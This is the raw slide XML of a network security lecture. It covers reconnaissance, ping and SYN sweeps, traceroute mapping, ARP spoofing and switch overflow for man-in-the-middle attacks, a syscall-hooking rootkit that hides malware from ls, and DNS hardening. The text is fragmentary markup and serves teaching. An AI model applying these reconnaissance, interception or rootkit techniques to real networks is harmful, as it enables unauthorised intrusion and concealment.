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March 1, 2019</a:t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received, then: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SYN-ACK: Valid IP and running application on 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TCP-RST: Valid IP with invalid application port (try others)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ICMP-host unreachable: No live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Nothing: No live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 known port numbers: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HTTP 80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HTTPS 443 Web (secure)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FTP 20, 21 File transfer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DNS 53 Find IP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SSH 22 Remote login (secure)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Telnet 23 Remote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defense: Make sure ICMP replies don’t leave organization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Invalid TCP packet sending is called finger printing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3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4" name="Google Shape;414;p3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5" name="Google Shape;415;p38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1" name="Google Shape;421;p3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2" name="Google Shape;422;p39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8" name="Google Shape;428;p40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9" name="Google Shape;429;p40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5" name="Google Shape;435;p4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6" name="Google Shape;436;p41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4" name="Google Shape;444;p43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0" name="Google Shape;450;p4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44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4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45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5" name="Google Shape;465;p4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6" name="Google Shape;466;p47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7" name="Google Shape;507;p4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8" name="Google Shape;508;p48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7" name="Google Shape;527;p4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8" name="Google Shape;528;p49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4" name="Google Shape;534;p50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5" name="Google Shape;535;p50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1" name="Google Shape;541;p5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2" name="Google Shape;542;p51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8" name="Google Shape;548;p52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9" name="Google Shape;549;p52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6" name="Google Shape;556;p5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7" name="Google Shape;557;p53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3" name="Google Shape;563;p5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4" name="Google Shape;564;p54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0" name="Google Shape;570;p5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1" name="Google Shape;571;p56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6" name="Google Shape;596;p5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p57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3" name="Google Shape;603;p5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4" name="Google Shape;604;p58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7" name="Google Shape;627;p5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8" name="Google Shape;628;p59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Methods if A is trying to sniff…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1. Try to overload the switch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How to overflow the table that stores addresses??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The table functions like a cache.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ARP replies will accept unsolicited replies into the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2. A becomes the man-in the middle (R-&gt;A-&gt;X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5" name="Google Shape;655;p60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6" name="Google Shape;656;p60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ARP maps IP to MAC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Switch asks: Who has IP “X”??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8" name="Google Shape;688;p6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9" name="Google Shape;689;p61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Method 2. A becomes the man-in the middle (R-&gt;A-&gt;X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Step one puts values in table.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Step 3 sends the message to A instead of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Step 4 sends the message back to R to reroute to X (may have modified the message)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Step 5 X finally receives the message after A has intercepted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8" name="Google Shape;718;p6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64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5" name="Google Shape;725;p6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6" name="Google Shape;726;p65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2" name="Google Shape;732;p6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3" name="Google Shape;733;p66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Switch looks at the link layer header.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Layout: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[LINK LAYER HEADER] - [IP] - [TCP/UDP] - [APP HEADER] - [APP DATA]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9" name="Google Shape;739;p6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0" name="Google Shape;740;p67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5" name="Google Shape;755;p6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6" name="Google Shape;756;p68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TCP 3 way handshake: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Client sends SYN to server (seq=1)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Server send SYNACK to client (seq=1, ack=1) -🡪acknowledges that server has seen client’s 1</a:t>
            </a:r>
            <a:r>
              <a:rPr baseline="30000" lang="en-GB"/>
              <a:t>st</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t> 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Client sends ACK to server (seq=2, ack=1)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Sequence number tells where you are in the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In reality they start from a random number for initial sequence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Ex. Client can pick 3 for initial and server can choose 99 for its initial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2" name="Google Shape;762;p6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3" name="Google Shape;763;p69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0" name="Google Shape;770;p70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1" name="Google Shape;771;p70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8" name="Google Shape;778;p7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9" name="Google Shape;779;p71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6" name="Google Shape;786;p7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7" name="Google Shape;787;p74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3" name="Google Shape;793;p7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4" name="Google Shape;794;p75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0" name="Google Shape;800;p7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1" name="Google Shape;801;p76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8" name="Google Shape;808;p7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9" name="Google Shape;809;p77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5" name="Google Shape;825;p7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6" name="Google Shape;826;p78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2" name="Google Shape;832;p7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3" name="Google Shape;833;p79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9" name="Google Shape;839;p8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0" name="Google Shape;840;p81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6" name="Google Shape;846;p82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7" name="Google Shape;847;p82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3" name="Google Shape;853;p83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4" name="Google Shape;854;p83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ARIN: American Registry for Internet Numbers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0" name="Google Shape;860;p84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1" name="Google Shape;861;p84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7" name="Google Shape;867;p85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8" name="Google Shape;868;p85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EX: change command “ls” to hide the malware.exe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ls issues a reads sys call. The attacker can create another kernel module that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the equivalent of the statement “if(fname == “malware.exe”) skip”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Make the syscall table point to attacker’s kernel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Hashing won’t help anymore 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4" name="Google Shape;874;p86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5" name="Google Shape;875;p86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1" name="Google Shape;881;p87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2" name="Google Shape;882;p87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8" name="Google Shape;888;p88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9" name="Google Shape;889;p88:notes"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1046163" y="4352925"/>
            <a:ext cx="4770437" cy="3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Which DNS servers does this domain have?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Defined by NS: nsztm1.digi.ninja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Which mail servers does this domain have?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Defined by MX: ASPMX?.GOOGLEMAIL.COM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Are there any Web servers? What is their IP?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	Defined by A (IPv4): Look for where names relate to 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Defined by AAAA (IPv6): “”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Can you find names and phones of people in this organization?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Yes: Pippa +44 123 456789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What other servers can you see in the listing?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Other A, AAAA listings without web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heops-ng.sourceforge.ne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nessus.org" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.nessus.or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Intrusions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Protecting DNS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Provide only necessary information</a:t>
            </a:r>
            <a:endParaRPr sz="2200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-4445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No OS info and no comments</a:t>
            </a:r>
            <a:endParaRPr sz="2200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-4953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Restrict zone transfers </a:t>
            </a:r>
            <a:endParaRPr sz="2200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-4445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Allow for only a few internal hosts</a:t>
            </a:r>
            <a:endParaRPr sz="2200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-4953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Use split-horizon DNS to show a different DNS view to external and internal users</a:t>
            </a:r>
            <a:endParaRPr sz="2200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="169" name="Google Shape;169;p24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5614886" y="3783575"/>
            <a:ext cx="1137900" cy="674100"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse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719084" y="4457801"/>
            <a:ext cx="1137900" cy="674100"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse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3744361" y="5438494"/>
            <a:ext cx="1137900" cy="674100"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse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752368" y="4825561"/>
            <a:ext cx="531000" cy="3678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6904032" y="5499787"/>
            <a:ext cx="531000" cy="3678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766550" y="5366985"/>
            <a:ext cx="531000" cy="3678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965682" y="5254614"/>
            <a:ext cx="531000" cy="3678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828200" y="5990134"/>
            <a:ext cx="15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368288" y="3967455"/>
            <a:ext cx="1137900" cy="674100"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse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1747449" y="5132027"/>
            <a:ext cx="531000" cy="367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899113" y="5806254"/>
            <a:ext cx="531000" cy="367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761632" y="5673452"/>
            <a:ext cx="531000" cy="367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85799" y="6296600"/>
            <a:ext cx="1909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722243" y="4346708"/>
            <a:ext cx="530825" cy="897691"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="703" w="336">
                <a:moveTo>
                  <a:pt x="334" y="615"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="334" y="703"/>
                  <a:pt x="336" y="615"/>
                  <a:pt x="336" y="614"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="336" y="613"/>
                  <a:pt x="332" y="610"/>
                  <a:pt x="331" y="609"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="330" y="608"/>
                  <a:pt x="328" y="606"/>
                  <a:pt x="328" y="606"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="328" y="606"/>
                  <a:pt x="332" y="611"/>
                  <a:pt x="331" y="612"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="330" y="613"/>
                  <a:pt x="329" y="614"/>
                  <a:pt x="324" y="614"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="319" y="614"/>
                  <a:pt x="311" y="612"/>
                  <a:pt x="301" y="611"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="291" y="610"/>
                  <a:pt x="288" y="614"/>
                  <a:pt x="262" y="606"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="236" y="598"/>
                  <a:pt x="178" y="579"/>
                  <a:pt x="145" y="561"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="112" y="543"/>
                  <a:pt x="89" y="525"/>
                  <a:pt x="67" y="501"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="45" y="477"/>
                  <a:pt x="24" y="442"/>
                  <a:pt x="13" y="417"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2" y="392"/>
                  <a:pt x="0" y="372"/>
                  <a:pt x="0" y="350"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="328"/>
                  <a:pt x="1" y="307"/>
                  <a:pt x="10" y="285"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19" y="263"/>
                  <a:pt x="33" y="240"/>
                  <a:pt x="55" y="216"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="77" y="192"/>
                  <a:pt x="105" y="162"/>
                  <a:pt x="144" y="141"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="183" y="120"/>
                  <a:pt x="258" y="100"/>
                  <a:pt x="288" y="92"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="318" y="84"/>
                  <a:pt x="320" y="94"/>
                  <a:pt x="327" y="92"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="334" y="90"/>
                  <a:pt x="332" y="82"/>
                  <a:pt x="331" y="81"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="330" y="80"/>
                  <a:pt x="319" y="84"/>
                  <a:pt x="319" y="84"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="319" y="84"/>
                  <a:pt x="329" y="79"/>
                  <a:pt x="331" y="81"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="333" y="83"/>
                  <a:pt x="330" y="92"/>
                  <a:pt x="331" y="96"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="332" y="100"/>
                  <a:pt x="334" y="106"/>
                  <a:pt x="334" y="105"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="334" y="104"/>
                  <a:pt x="334" y="92"/>
                  <a:pt x="334" y="90"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="334" y="88"/>
                  <a:pt x="334" y="93"/>
                  <a:pt x="334" y="93"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="334" y="93"/>
                  <a:pt x="333" y="92"/>
                  <a:pt x="333" y="92"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="333" y="92"/>
                  <a:pt x="331" y="91"/>
                  <a:pt x="331" y="90"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="331" y="89"/>
                  <a:pt x="334" y="0"/>
                  <a:pt x="334" y="87"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="334" y="174"/>
                  <a:pt x="334" y="521"/>
                  <a:pt x="334" y="615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848630" y="4530587"/>
            <a:ext cx="800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3747521" y="5326123"/>
            <a:ext cx="530825" cy="897691"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="703" w="336">
                <a:moveTo>
                  <a:pt x="334" y="615"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="334" y="703"/>
                  <a:pt x="336" y="615"/>
                  <a:pt x="336" y="614"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="336" y="613"/>
                  <a:pt x="332" y="610"/>
                  <a:pt x="331" y="609"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="330" y="608"/>
                  <a:pt x="328" y="606"/>
                  <a:pt x="328" y="606"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="328" y="606"/>
                  <a:pt x="332" y="611"/>
                  <a:pt x="331" y="612"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="330" y="613"/>
                  <a:pt x="329" y="614"/>
                  <a:pt x="324" y="614"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="319" y="614"/>
                  <a:pt x="311" y="612"/>
                  <a:pt x="301" y="611"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="291" y="610"/>
                  <a:pt x="288" y="614"/>
                  <a:pt x="262" y="606"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="236" y="598"/>
                  <a:pt x="178" y="579"/>
                  <a:pt x="145" y="561"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="112" y="543"/>
                  <a:pt x="89" y="525"/>
                  <a:pt x="67" y="501"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="45" y="477"/>
                  <a:pt x="24" y="442"/>
                  <a:pt x="13" y="417"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2" y="392"/>
                  <a:pt x="0" y="372"/>
                  <a:pt x="0" y="350"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="328"/>
                  <a:pt x="1" y="307"/>
                  <a:pt x="10" y="285"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19" y="263"/>
                  <a:pt x="33" y="240"/>
                  <a:pt x="55" y="216"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="77" y="192"/>
                  <a:pt x="105" y="162"/>
                  <a:pt x="144" y="141"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="183" y="120"/>
                  <a:pt x="258" y="100"/>
                  <a:pt x="288" y="92"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="318" y="84"/>
                  <a:pt x="320" y="94"/>
                  <a:pt x="327" y="92"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="334" y="90"/>
                  <a:pt x="332" y="82"/>
                  <a:pt x="331" y="81"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="330" y="80"/>
                  <a:pt x="319" y="84"/>
                  <a:pt x="319" y="84"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="319" y="84"/>
                  <a:pt x="329" y="79"/>
                  <a:pt x="331" y="81"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="333" y="83"/>
                  <a:pt x="330" y="92"/>
                  <a:pt x="331" y="96"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="332" y="100"/>
                  <a:pt x="334" y="106"/>
                  <a:pt x="334" y="105"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="334" y="104"/>
                  <a:pt x="334" y="92"/>
                  <a:pt x="334" y="90"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="334" y="88"/>
                  <a:pt x="334" y="93"/>
                  <a:pt x="334" y="93"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="334" y="93"/>
                  <a:pt x="333" y="92"/>
                  <a:pt x="333" y="92"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="333" y="92"/>
                  <a:pt x="331" y="91"/>
                  <a:pt x="331" y="90"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="331" y="89"/>
                  <a:pt x="334" y="0"/>
                  <a:pt x="334" y="87"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="334" y="174"/>
                  <a:pt x="334" y="521"/>
                  <a:pt x="334" y="615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870748" y="5487018"/>
            <a:ext cx="800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4818649" y="4764268"/>
            <a:ext cx="75900" cy="61200"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/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4856565" y="5744960"/>
            <a:ext cx="75900" cy="61200"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/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690647" y="5744960"/>
            <a:ext cx="75900" cy="612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681168" y="4748944"/>
            <a:ext cx="75900" cy="612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>
            <a:off x="2505770" y="4335215"/>
            <a:ext cx="11379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2505770" y="4335215"/>
            <a:ext cx="1213500" cy="14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2" name="Google Shape;192;p24"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4856486" y="4212628"/>
            <a:ext cx="758400" cy="5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3" name="Google Shape;193;p24"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4932386" y="4212628"/>
            <a:ext cx="682500" cy="15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7434857" y="3844868"/>
            <a:ext cx="1137900" cy="674100"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse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b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6752368" y="4090041"/>
            <a:ext cx="682500" cy="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4"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="2430086" y="4151428"/>
            <a:ext cx="3184800" cy="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Reconnaissance Tools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Tools that integrate Whois, ARIN, DNS interrogation and many more services:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-4572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Applications</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-4572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Web-based portals </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="2" marL="1360488" rtl="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GB" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="000099"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://www.network-tools.com</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:solidFill>
                <a:srgbClr val="000099"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-2794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096000" y="4680858"/>
            <a:ext cx="1447800" cy="1295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At The End Of Reconnaissance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81000" y="1384299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has a list of IP addresses assigned to the target network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He has some administrative information about the target network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He may also have a few “live” addresses and some idea about functionalities of the attached computers </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="2800"/>
            </a:br>
            <a:endParaRPr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Phase 2: Scanning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Detecting information useful for break-in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Live machines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Network topology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Firewall configuration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Applications and OS types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Vulnerabilities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685800" y="2116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Network Mapping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Finding live hosts</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr indent="-4318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Ping sweep – send ping packets to each assigned IP</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr indent="-4318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TCP SYN sweep – send TCP SYN packets to each assigned IP to a specific port</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr indent="-431800" lvl="1" marL="979487" rtl="0" algn="l"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If received, then:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="2000"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="2000"/>
              <a:t>	SYN-ACK: Valid IP and running application on port</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="2000"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="2000"/>
              <a:t>	TCP-RST: Valid IP with invalid application port (try others)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="2000"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="2000"/>
              <a:t>	ICMP-host unreachable: No live machine</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="2000"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="2000"/>
              <a:t>	Nothing: No live machine</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr indent="-4826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Map network topology </a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr indent="-4318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Traceroute</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/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Sends out ICMP or UDP packets with increasing TTL</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/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Gets back ICMP_TIME_EXCEEDED message from intermediate routers</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr indent="-4572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864745" y="2188616"/>
            <a:ext cx="662070" cy="472849"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="DA1F2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2246704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3530310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5516520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7637847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6975776" y="1051151"/>
            <a:ext cx="1144717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6975777" y="3813603"/>
            <a:ext cx="955554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1512860" y="2425041"/>
            <a:ext cx="719889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9" name="Google Shape;239;p29"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="2894819" y="2425041"/>
            <a:ext cx="621536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0" name="Google Shape;240;p29"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="234" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="4192320" y="2425041"/>
            <a:ext cx="13242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1" name="Google Shape;241;p29"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="234" idx="6"/>
            <a:endCxn id="235" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6178590" y="2425041"/>
            <a:ext cx="1459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29"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="234" idx="0"/>
            <a:endCxn id="236" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="5847555" y="1454816"/>
            <a:ext cx="1296000" cy="73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29"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="237" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5847615" y="2661550"/>
            <a:ext cx="1268100" cy="1221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Google Shape;244;p29"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="1526815" y="1454776"/>
            <a:ext cx="5242500" cy="679800"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd fmla="val 7525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5" name="Google Shape;245;p29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5053352" y="381000"/>
            <a:ext cx="3709648" cy="4320471"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse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1277371" y="1524000"/>
            <a:ext cx="37759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ICMP_ECHO to www.victim.com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 flipH="1" rot="10800000">
            <a:off x="1512860" y="1756405"/>
            <a:ext cx="5602800" cy="959100"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd fmla="val 8665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29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1277371" y="2947322"/>
            <a:ext cx="23519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4a. ICMP_REPLY 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www.victim.com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6978021" y="4732964"/>
            <a:ext cx="1321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39708" y="3936890"/>
            <a:ext cx="5174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R1-R2-R3-www is my path to www.victim.com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63595" y="581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Traceroute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864745" y="2188616"/>
            <a:ext cx="662070" cy="472849"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="DA1F2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2246704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3530310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5516520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7637847" y="2188616"/>
            <a:ext cx="662070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6975776" y="1051151"/>
            <a:ext cx="1144717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6975777" y="3813603"/>
            <a:ext cx="955554" cy="472849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>
            <a:off x="1512860" y="2425041"/>
            <a:ext cx="719889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5" name="Google Shape;265;p30"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="2894819" y="2425041"/>
            <a:ext cx="621536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6" name="Google Shape;266;p30"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="260" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="4192320" y="2425041"/>
            <a:ext cx="13242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30"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="260" idx="6"/>
            <a:endCxn id="261" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6178590" y="2425041"/>
            <a:ext cx="1459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8" name="Google Shape;268;p30"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="260" idx="0"/>
            <a:endCxn id="262" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="5847555" y="1454816"/>
            <a:ext cx="1296000" cy="73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0"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="263" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5847615" y="2661550"/>
            <a:ext cx="1268100" cy="1221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30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5053352" y="381000"/>
            <a:ext cx="3709648" cy="4320471"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse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277371" y="1524000"/>
            <a:ext cx="334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for db and mail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978021" y="4732964"/>
            <a:ext cx="1321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539708" y="3936890"/>
            <a:ext cx="52247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R1-R2-R3-www is my path to www.victim.com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R1-R2-R3-db is my path to db.victim.com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R1-R2-R3-mail is my path to mail.victim.com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 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 network is a star with R3 at the center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463595" y="581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Traceroute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685800" y="8466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Network Mapping Tools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381000" y="1227667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Cheops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Linux application</a:t>
            </a:r>
            <a:endParaRPr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http://cheops-ng.sourceforge.net/</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="000099"/>
              </a:solidFill>
            </a:endParaRPr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Automatically performs ping sweep and network mapping and displays results in a GUI</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="282" name="Google Shape;282;p31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4499428" y="3975587"/>
            <a:ext cx="1219200" cy="1143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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4601030" y="2369460"/>
            <a:ext cx="4572000" cy="3848100"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="2424" w="2880">
                <a:moveTo>
                  <a:pt x="0" y="1184"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="16" y="1036"/>
                  <a:pt x="32" y="888"/>
                  <a:pt x="192" y="800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="352" y="712"/>
                  <a:pt x="736" y="784"/>
                  <a:pt x="960" y="656"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1184" y="528"/>
                  <a:pt x="1256" y="64"/>
                  <a:pt x="1536" y="32"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1816" y="0"/>
                  <a:pt x="2496" y="248"/>
                  <a:pt x="2640" y="464"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2784" y="680"/>
                  <a:pt x="2368" y="1104"/>
                  <a:pt x="2400" y="1328"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2432" y="1552"/>
                  <a:pt x="2880" y="1632"/>
                  <a:pt x="2832" y="1808"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2784" y="1984"/>
                  <a:pt x="2328" y="2344"/>
                  <a:pt x="2112" y="2384"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1896" y="2424"/>
                  <a:pt x="1805" y="2065"/>
                  <a:pt x="1536" y="2048"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1267" y="2031"/>
                  <a:pt x="751" y="2423"/>
                  <a:pt x="496" y="2280"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="241" y="2137"/>
                  <a:pt x="110" y="1419"/>
                  <a:pt x="8" y="1192"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:cu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>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="8164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Defenses Against Network </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB"/>
